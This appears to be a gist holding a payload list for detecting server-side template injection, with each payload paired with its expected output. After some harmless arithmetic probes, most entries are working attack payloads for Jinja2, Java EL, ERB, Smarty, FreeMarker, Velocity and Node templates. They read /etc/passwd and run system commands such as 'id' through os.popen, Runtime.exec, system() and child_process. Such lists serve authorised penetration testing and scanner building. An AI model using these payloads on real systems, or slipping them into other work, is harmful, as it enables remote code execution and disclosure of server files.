gistfile1.txt

# SSTI payloads (one per line)
#   payload||expected_output
# Example confirm:
#   {{7*7}}||49
#
# File-read confirm example:
#   {{lipsum.__globals__['os'].popen('cat /etc/passwd').read()}}||root:x:0:0

# Safe math confirms
{{7*7}}||49
${7*7}||49
<%= 7*7 %>||49
{7*7}||49
{{ 7 * 7 }}||49

# Advanced safe diff proof
{{7*7}}-{{7*8}}||49-56

# Liquid
{{ 7 | times: 7 }}||49

# Velocity
#set($x=7*7)$x||49

# Possible fingerprint (no expected)
{{config}}

#file-read
{{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}||root:x:0:0:
${new java.util.Scanner(new java.io.File('/etc/passwd')).useDelimiter('\\Z').next()}||root:x:0:0:
<%= File.read('/etc/passwd') %>||root:x:0:0:
{php}echo file_get_contents('/etc/passwd');{/php}||root:x:0:0:

#RCE
{{lipsum.__globals__['os'].popen('id').read()}}||uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)
${T(java.lang.Runtime).getRuntime().exec('id')}||uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)
<%= system('id') %>||uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)
{php}system('id');{/php}||uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)
${"freemarker.template.utility.Execute"?new()("id")}||uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)
#set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($ex=$rt.getRuntime().exec('id'))||uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)
#{process.mainModule.require('child_process').execSync('id').toString()}||uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)